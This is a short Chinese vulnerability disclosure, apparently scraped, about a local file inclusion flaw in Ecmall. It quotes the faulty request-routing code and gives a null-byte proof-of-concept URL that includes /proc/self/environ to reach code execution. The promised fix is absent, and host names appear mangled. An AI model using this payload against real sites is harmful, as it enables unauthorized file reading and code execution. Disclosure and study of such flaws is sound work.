编外:以前的一个: http://HdhCmsTest2cto测试数据/Article/200903/36736.html
路人甲
简要描述:Ecmall的默认处理中犯了一个严重的错误,绕开了系统中的保护逻辑从而导致可以包含任意文件以php代码执行 详细说明:eccore/ecmall.php内
if (!get_magic_quotes_gpc())
{
$_GET = addslashes_deep($_GET);
$_POST = addslashes_deep($_POST);
$_COOKIE= addslashes_deep($_COOKIE);
}
/* 请求转发 */
$default_app = $config['default_app'] ? $config['default_app'] : 'default';
$default_act = $config['default_act'] ? $config['default_act'] : 'index';
$app = isset($_REQUEST['app']) ? trim($_REQUEST['app']) : $default_app;
$act = isset($_REQUEST['act']) ? trim($_REQUEST['act']) : $default_act;
$app_file = $config['app_root'] . "/{$app}.app.php";
if (!is_file($app_file))
{
exit('Missing controller');
} 貌似是考虑到GPC对程序的影响所以进行了强制保护,但是REQUEST的内容却缺乏保护,导致可以包含代码执行
漏洞证明: HdhCmsTest2cto测试数据 /index.php?app=proc/self/environ%002cto测试数据 修复方案:不需要啊不需要
查看更多关于Ecmall全版本本地文件包含漏洞及修复(REQUEST内容缺的详细内容...